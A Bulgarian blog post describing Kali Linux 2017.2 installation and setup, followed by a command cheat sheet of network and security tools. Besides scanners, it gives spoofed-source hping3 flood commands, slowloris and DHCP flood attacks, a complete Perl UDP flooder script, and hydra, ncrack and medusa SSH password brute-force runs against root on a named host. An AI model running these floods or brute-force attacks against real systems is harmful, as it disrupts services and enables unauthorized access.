Kali Linux

Kali Linux 2017.2 Release

Каlі Lіnuх e диcтpибyция базирана на Debian Linux, с набор от инструменти зa тecтвaнe нa инфopмaциoннaтa cигypнocт (Penetration test). Каlі Lіnuх ce paзпpocтpaнявa в peжим нa нeпpeĸъcнaтo oбнoвявaнe (rоllіng dіѕtrіbutіоn). B диcтpибyциятa e въвeдeнa cиcтeмa зa пpoвepĸa нa вepcиитe нa включения софтуер. Поддържа х32, х64 и АRМ apxитeĸтypи.

След като зареди от CD или от Flash drive ще се появи Boot menu на Kali Linux което ще ни предложи различни опции. Тези на които трябва да се обърне внимание са стартиране на жив образ Live (amd64) или Install – инсталиране на системата на диск. Тъй като Kali Linux е базирана на Debian (една от най разпространените Линукс дистрибуции) инсталациятa на операционната система е напълно идентична с инсталатора на Debian който не е променян поне от 10 години.

Обновяване на системата след инсталация

$ sudo apt-get update && sudo apt-get upgrade && sudo apt-get dist-upgrade
$ sudo apt-get autoremove && sudo apt-get autoclean

Инсталиране на основен софтуер

$ sudo apt-get install ttf-mscorefonts-installer gimp thunderbird rar htop filezilla vlc mtr-tiny transmission neofetch bmon sshpass

Безжичен адаптер Broadcom

Проверка с командата lspci дали безжичната карта е Broadcom.

Ако и вашият лаптоп е като моя с безжична карта Broadcom след инсталация на операционната система ще ви работи само Ethernet (Лан) картата. С лан кабел се свързвате към някой рутер за да имате Интернет и със следните команди може да заредите модула за безжичната карта Broadcom.

$ apt-get update
$ apt-get install linux-image-$(uname -r|sed 's,[^-]*-[^-]*-,,') linux-headers-$(uname -r|sed 's,[^-]*-[^-]*-,,') broadcom-sta-dkms
$ modprobe -r b44 b43 b43legacy ssb brcmsmac bcma
$ modprobe wl

Управление на батерията за Лаптоп

Оптимизираното управление на батерията я щади и удължава живота и. Демона tlp трябва задължително да е инсталиран в стандартен лаптоп, в противен случай при най малкото натоварване охлаждащия модул на процесора от време на време ще работи на максимални обороти без да е нужно това.

$ sudo apt install tlp
$ sudo tlp start

Инсталация на Winbox

Тъй като аз съм инсталирал 64 битов Kali Linux а winbox е 32 битов трябва да добавя такава 32 битова архитектура в хранилището на дистрибуцията, да опресня базата и чак след това да инсталирам 32 битов wine емулатор, който ще стартира winbox.

$ wget -c https://download2.mikrotik.com/routeros/winbox/3.11/winbox.exe
$ sudo dpkg --add-architecture i386 && sudo apt-get update && sudo apt-get install wine32
$ wine winbox.exe

Инсталация на Skype

Наскоро “микромеката” компания изненада с нова версия на Skype, втора седмица съм с нея, работи учудващо добре.

$ wget -c https://go.skype.com/skypeforlinux-64.deb
$ sudo dpkg -i skypeforlinux-64.deb
$ sudo apt-get install -f

Kali Linux има богата база от инструменти за откриване и решаване на проблеми свързани с мрежи, сървъри, дупки в сигурноста и т. н. което превръща тази дистрибуция в удобен инструмент за работа на всеки мрежов/системен администратор. Ще споделя една част от инструментите които ползвам често, както и други такива които ги няма в базата на дистрибуцията. Това което ще покажа, не претендира, че е пълна картина на възможностите на системата (умишелно няма примери с exploits,air-crack и mysql injection). По скоро ми се иска това да е подсещаща статийка с набор от инструменти които надявам се ще помогнат на някой колега, а може би и на мен когато не мога да се сетя нещо. В примерите по долу няма да срешнете подробни описания, считам това за ненужно. Ако сте стигнали до тук значи знаете какво търсите, въпреки това се надявам, че ще бъдете умни и някои от примерите няма да ги пробвате върху Интернет доставчика си например !

nmap – network scanner

$ nmap 93.155.130.11

analyze_hosts – very powerful scanner

git clone https://github.com/PeterMosmans/security-scripts.git
sudo apt-get install python-nmap
cd security-scripts/
pip install -r requirements.txt
./analyze_hosts.sh -a telehost.bg

mtr – traceroute

$ mtr kali.org

arp-scan – arp scanner

$ sudo arp-scan -l

automater URL/IP scanner

automater -s robtex 93.155.130.11

wpscan – WordPress security scanner

$ sudo wpscan --url itservice-bg.net

braa – SNMP Scanner

$ braa public@192.168.60.1:.1.3.6.*

cisco-torch – Cisco scanning

$ cisco-torch -A 172.16.99.2

dmitry – IP/Host information tool

dmitry itservice-bg.net

dnsrecon – check all NS records

$ dnsrecon -d itservice-bg.net

fierce – corporate map

$ fierce -dns itservice-bg.net

hping3 – flood from random source IP

$ sudo hping3 -S -P -U --flood -V --rand-source 192.168.60.1
$ sudo hping3 -c 10000 -d 120 -S -w 64 -p 21 --flood --rand-source 192.168.60.1
$ sudo timeout 10s hping3 -d 64 -2 -p 53 --flood --rand-source 192.168.60.1

-c 100000 = Number of packets to send.
-d 120 = Size of each packet that was sent to target machine.
-S = Set SYN tcp flag.
-P –push = Set PUSH tcp flag.
-A –ack = Set ACK tcp flag.
-U –urg = Set URG tcp flag.
-w 64 = TCP window size.
-p 21 = Destination port (21 being FTP port)
–flood = Sending packets as fast as possible.
–rand-source = Using Random Source IP Addresses.
192.168.60.1 = Destination IP address or target machines IP address.
timeout 10s = Тime of attack.

masscan – network TCP port scanner

$ sudo masscan -p22,80,445 192.168.60.0/24

sslscan – analyze the SSL

$ sslscan itservice-bg.net

sslyze – analyze the SSL

$ sslyze --regular itservice-bg.net

tlssled – analyze the SSL

$ tlssled itservice-bg.net 443

pig – DHCP flood attack

$ sudo pig.py eth0

slowloris – DDos for web server

$ sudo apt-get install libwww-mechanize-shell-perl
$ git clone https://github.com/llaera/slowloris.pl
$ perl slowloris.pl/slowloris.pl -dns itservice-bg.net

flood.pl – DDos udp flooder

$ nano flood.pl
#!/usr/bin/perl
 
# ./flood.pl 192.168.60.1 0 0 0
 
use Socket;
use strict;
 
if ($#ARGV != 3) {
print " ./flood.pl 0 0 0\n";
print " port=0: use random ports\n";
print " size=0: use random size between 64 and 1024\n";
print " time=0: continuous flood\n";
exit(1);
}
my ($ip,$port,$size,$time) = @ARGV;
my ($iaddr,$endtime,$psize,$pport);
$iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n";
$endtime = time() + ($time ? $time : 1000000);
socket(flood, PF_INET, SOCK_DGRAM, 17);
print "Flooding $ip " . ($port ? $port : "random") . " port with " .
($size ? "$size-byte" : "random size") . " packets" .
($time ? " for $time seconds" : "") . "\n";
print "Break with Ctrl-C\n" unless $time;
for (;time() <= $endtime;) {
$psize = $size ? $size : int(rand(1024-64)+64) ;
$pport = $port ? $port : int(rand(65500))+1;
send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport, $iaddr));}

save text editor = Ctrl+o+Enter
exit text editor = Ctrl+X

$ chmod 755 flood.pl
$ perl flood.pl 192.168.60.1 0 0 0

$ bmon

hydra, ncrack, medusa – passwords wordlist attack

$ hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt backup.itservice-bg.net ssh

the attacking machine

the logs of the attacked machine

$ sudo tail -f /var/log/auth.log

$ ncrack --user root -P /usr/share/wordlists/metasploit/unix_passwords.txt backup.itservice-bg.net:22
$ medusa -u root -P /usr/share/wordlists/metasploit/unix_passwords.txt -h backup.itservice-bg.net -M ssh

uniscan – Web scanner

$ sudo uniscan -u http://93.155.130.11 -qd

OWASP ZAP – Web scanner

Leave a Reply

Your email address will not be published. Required fields are marked *